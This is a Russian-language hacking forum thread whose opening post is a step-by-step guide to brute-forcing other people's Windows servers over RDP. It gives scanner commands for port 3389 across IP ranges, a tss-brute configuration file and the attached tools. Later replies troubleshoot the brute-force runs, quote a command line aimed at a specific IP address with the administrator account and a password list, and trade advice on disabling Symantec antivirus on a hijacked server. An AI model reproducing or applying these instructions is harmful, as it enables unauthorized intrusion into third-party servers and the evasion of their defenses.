ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > Underground > Информационная безопасность

Информационная безопасность Всё о безопасности в сети. Любые просьбы о взломах караются по всей строгости закона ;)

 
 
Опции темы Рейтинг: Рейтинг темы: голосов - 9, средняя оценка - 3.11.
Старый 07.08.2008, 00:54   #1
Участник заблокирован
 
Регистрация: 11.12.2007
Сообщений: 935

Репутация: 1508
По умолчанию Брут дедиков [by Capcha]

Расскажу вам как брутить дедики моим старым способом.

ЧТО НУЖНО??
1. Нам нужен VNC_Byauth сканер (В аттаче).
2. Нужен tss-brute (В аттаче).
3. Нужен мой скрипт на PHP для генерации BAT файлов (Смотрим в аттаче).
4. Прога от RankroR'a для выдирания гудов ,которую он делал спец. для меня качаем (В аттаче).
6. RDP 5.1 (В аттаче).
6. Как всегда руки.
7. Мозг тоже пригодится.


Начнём!!

1. Открываем cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда мой конфиг
Код:
[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=\x\&u\&
WinLogonAct=\&u\&
PriorWinLogon=Options>>
PriorWinLogonAct=\&o\&
NTSecurity=ShutDownWindows
NTSecurityAct=\p\p\p\p\p\l
SureLogoff=Logoff
SureLogoffAct=\n
StartLogoff=\p\p\p\p\p\72\*72\n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1
и сохраняем.

6. Создаём в той же папке где лежит наш BAT фаил папку которую вы вписывали в скрипте(ОБЯЗАТЕЛЬНО!!!!)

7. После выполнения Брута заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку output и вней output.txt

8. Вписываем в программе success , если хоть один дед сбручен программа вам покажет это, если что-то сбрутилось то смотри output.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды ;)

10. Фсё на этом я закончил если что-то не ясно задаём вопросы тут ))

Для тех у кого не работает брут:
1. Если у вас после запуска бат файла не появляется окно РДП клиента, а запрос на ввод пароля и логина, то скачайте 5версию MSTSC и установите её в безопасном режиме.

2. Если у вас загружается окно РДП клиента, но не происходит подбор паролей, попробуйте отключить брэндмауэр. Иногда брут не может выполнять свои действия если язык на дедике не Англиский.

3. Если не происходит подбор паролей, то поменяйте в панели управления язык по умолчанию на Англиский.

3. Если у вас не работает мой скрипт (если выводит лишние слэши) , это значит что вы не залили .htaccess который идёт вместе с моим скриптом, если так и не получилось запустить, то воспользуйтесь ссылкой которая ниже на полностью работающий сайт с моим скриптом.

Спецально для тех кому не хочется парить мозг с моим скриптом RankoR написал программу для генерирования батников, качаем тут http://forum.asechka.ru/showpost.php...&postcount=270



ТЕМА ОБНОВЛЕНА, ФАЙЛЫ ЗАЛИТЫ В АТТАЧ




VIDEO F.A.Q

Конечно же отдельное спасибо metal'у за его софтину (tss-brute)
(c) Capcha [07.08.2008] Special For Asechka.ru

Копирования статьи только с разрешения автора.
Вложения
Тип файла: rar rankor.rar (186.1 Кб, 2529 просмотров)
Тип файла: rar www.rar (894 байт, 2062 просмотров)
Тип файла: rar VNC_Bypauth.rar (5.8 Кб, 1724 просмотров)
Тип файла: rar tss-brute.rar (86.8 Кб, 2277 просмотров)
Тип файла: rar RDP_client 5.1.rar (397.9 Кб, 2124 просмотров)

Последний раз редактировалось Capcha; 17.05.2009 в 00:57.
Capcha вне форума  
Плюсанули Capcha — 2 :
Старый 31.01.2009, 12:28   #501
Участник
 
Регистрация: 16.02.2008
Сообщений: 7

Репутация: 3
По умолчанию

Дайте плз ссылку на сайт с ip адресами по странам
zazaza вне форума  
Старый 31.01.2009, 12:35   #502
Участник
 
Регистрация: 27.01.2008
Сообщений: 138

Репутация: 312
По умолчанию

S+eam, посмотри выше тсс уже раз 100 перезаливали
$Atlet$ вне форума  
Старый 31.01.2009, 12:38   #503
Участник
 
Аватар для [san-off]
 
Регистрация: 23.04.2007
Сообщений: 233

Репутация: 1027
По умолчанию

Цитата:
Сообщение от zazaza Посмотреть сообщение
Дайте плз ссылку на сайт с ip адресами по странам
http://www.proxyserverprivacy.com/ipaddress_range.php
[san-off] вне форума  
Старый 31.01.2009, 23:58   #504
Участник
 
Регистрация: 24.03.2008
Сообщений: 10

Репутация: 3
По умолчанию

почёму, года я открываю уже созданный мною бат, идёт не подключение и брут, а простов коммандной строке быстро пролистывается всё, что было в *.bat
War1og вне форума  
Старый 01.02.2009, 00:02   #505
Участник
 
Аватар для krobol
 
Регистрация: 16.01.2009
Сообщений: 10

Репутация: 2
По умолчанию

что-то неправильно указал - проверь всё, пути к программам
krobol вне форума  
Старый 01.02.2009, 00:07   #506
Участник
 
Регистрация: 24.03.2008
Сообщений: 10

Репутация: 3
По умолчанию

папку logs не создал...

теперь создал, открывается cmd, подключение ,появляется usr name;password... а брут не идёт!!!!!!!!
War1og вне форума  
Старый 01.02.2009, 00:11   #507
Участник
 
Аватар для krobol
 
Регистрация: 16.01.2009
Сообщений: 10

Репутация: 2
По умолчанию

пойдёт, жди - если не английский язык, то долго тормозит
krobol вне форума  
Старый 01.02.2009, 00:31   #508
Участник
 
Регистрация: 24.03.2008
Сообщений: 10

Репутация: 3
По умолчанию

ААА... не идёт брут и всё... ну что не так?
Цитата:
"D:\hack\ded\brute_by_spayder\ tss-brute.exe" -w "D:\hack\ded\brute_by_spayder\ pass.txt" -u administrator 217.139.5.51 >>logs/217.139.5.51.txt
тсс скачивал тут, папка пасс на месте и в ней есть пасы.

з.ы. на будущее: как сделать, чтобы не запрашивало каждый раз "подключить"
War1og вне форума  
Старый 01.02.2009, 00:40   #509
Участник
 
Аватар для krobol
 
Регистрация: 16.01.2009
Сообщений: 10

Репутация: 2
По умолчанию

у тебя должен стоять по умолчанию английский язык

чтобы не спрашивало подключить - поставь исключение в брандмауере windows на tss-brute
krobol вне форума  
Старый 01.02.2009, 01:00   #510
Участник
 
Регистрация: 24.03.2008
Сообщений: 10

Репутация: 3
По умолчанию

английский язык - по умолчанию
tss-brute - исключение в брандмауере(а ваще он выключен)
установил - 5 версию MSTSC (for XP)
----
всё равно брут не идёт
War1og вне форума  
Старый 01.02.2009, 02:14   #511
Участник
 
Регистрация: 16.11.2008
Сообщений: 19

Репутация: 5
По умолчанию

установи рдп 5 через безопасный режим и поставь атрибуты только чтение
shocker вне форума  
Старый 01.02.2009, 23:40   #512
Участник
 
Аватар для Analog
 
Регистрация: 26.10.2008
Сообщений: 18

ICQ: 1499898

Репутация: 1
По умолчанию

на первых пунктах проблема уже.
после скана VNC и status:100% никаких логов не появляется рядом с файлом. почему ?

Последний раз редактировалось Analog; 01.02.2009 в 23:45.
Analog вне форума  
Старый 02.02.2009, 04:01   #513
Участник
 
Регистрация: 24.03.2008
Сообщений: 10

Репутация: 3
По умолчанию

Цитата:
установи рдп 5 через безопасный режим и поставь атрибуты только чтение
просьба разъяснить поподробней, что это значит...
War1og вне форума  
Старый 02.02.2009, 07:52   #514
Супер Модератор
 
Аватар для BuG_4F
 
Регистрация: 11.04.2008
Сообщений: 490

ICQ: 324606

Репутация: 3207
ВКонтакте Twitter
По умолчанию

Цитата:
Сообщение от War1og Посмотреть сообщение
просьба разъяснить поподробней, что это значит...
Скачай пятую версию рдп ! Установи её (пятую версию рдп) через безопасный режим !!! И в свойствах поставь галочку - ТОЛЬКО ЧТЕНИЕ !
BuG_4F вне форума  
Старый 02.02.2009, 08:17   #515
Участник
 
Регистрация: 24.06.2008
Сообщений: 530

Репутация: 864
По умолчанию

War1og, если ты этого не понимаешь,то куда тебе дедики брутить...
...vamp вне форума  
Старый 02.02.2009, 14:05   #516
Участник
 
Регистрация: 16.11.2008
Сообщений: 19

Репутация: 5
По умолчанию

Цитата:
Сообщение от Analog Посмотреть сообщение
на первых пунктах проблема уже. после скана VNC и status:100% никаких логов не появляется рядом с файлом. почему ?
файл появляется в C:\Documents and Settings\Имя пользователя\
shocker вне форума  
Старый 02.02.2009, 15:18   #517
Участник
 
Аватар для Analog
 
Регистрация: 26.10.2008
Сообщений: 18

ICQ: 1499898

Репутация: 1
По умолчанию

shocker,благодарю!

а нельзя как-нибдуь вырубить системный динамик ? а то пищит при вводе неправильных паролей на некоторых дедах.
и можно ли-какнибудь довести до автоматизма ? нередко все таки встречаются деды с языками отличными от английского.
а так же иногда бывает вообще ничего автоматически не вводится, если даже язык интерфейса английский.

но в целом неплохая система.

Последний раз редактировалось Analog; 02.02.2009 в 15:29.
Analog вне форума  
Старый 02.02.2009, 15:53   #518
Участник
 
Регистрация: 16.11.2008
Сообщений: 19

Репутация: 5
По умолчанию

Цитата:
Сообщение от Analog Посмотреть сообщение
а нельзя как-нибдуь вырубить системный динамик ? а то пищит при вводе неправильных паролей на некоторых дедах.
всегда пищит на серверах вин2к, на других не наблюдал
shocker вне форума  
Старый 02.02.2009, 20:58   #519
Участник
 
Аватар для Analog
 
Регистрация: 26.10.2008
Сообщений: 18

ICQ: 1499898

Репутация: 1
По умолчанию

достался дедик, симантек удаляет мои файлы.
в настройки симантека зайти не могу - логин\пас просит.
вроде у них это по умолчанию всегда есть - не подскажите ?
если никак не удасться войти в настройки, то что можно еще сделать ?
Analog вне форума  
Старый 02.02.2009, 22:50   #520
Супер Модератор
 
Аватар для BuG_4F
 
Регистрация: 11.04.2008
Сообщений: 490

ICQ: 324606

Репутация: 3207
ВКонтакте Twitter
По умолчанию

Analog,
Попробуй через службы вырубить ...
BuG_4F вне форума  
Старый 02.02.2009, 23:26   #521
Участник
 
Регистрация: 09.01.2008
Сообщений: 14

ICQ: 233905

Репутация: 2
По умолчанию

Analog, http://letmegooglethatforyou.com/?q=...BD%D0%B8%D1%8E
ShtepselSPB вне форума  
Старый 03.02.2009, 01:48   #522
Участник
 
Аватар для Analog
 
Регистрация: 26.10.2008
Сообщений: 18

ICQ: 1499898

Репутация: 1
По умолчанию

BuG_4F,пробовал. все службы перевел вырубил и останавливал (пока не перезагружался правдо, но службы остановились)

ShtepselSPB, пробовал..

если ниче не придумаю - убью пути в реестере на антивир,может пароли собьются\убируться
Analog вне форума  
Старый 03.02.2009, 18:30   #523
Участник
 
Аватар для destrit
 
Регистрация: 03.11.2008
Сообщений: 28

Репутация: -1
По умолчанию

такой вопрос винда пропатчина на многопоточность но пир скане диапов количество потоков больше 300 не поднимается что делать
destrit вне форума  
Старый 03.02.2009, 22:49   #524
Супер Модератор
 
Аватар для BuG_4F
 
Регистрация: 11.04.2008
Сообщений: 490

ICQ: 324606

Репутация: 3207
ВКонтакте Twitter
По умолчанию

destrit,
Значит у тебя канал ~500 Кбит ...
BuG_4F вне форума  
Старый 04.02.2009, 14:04   #525
Участник
 
Аватар для destrit
 
Регистрация: 03.11.2008
Сообщений: 28

Репутация: -1
По умолчанию

еше такой вопрос после брута при поиске нашло деде с валидным паролем но пир входе там было это

пробывал подобрать но увы и вообще подскажите что это
destrit вне форума  
 

Метки
brute, dedicated server


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 23:03.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи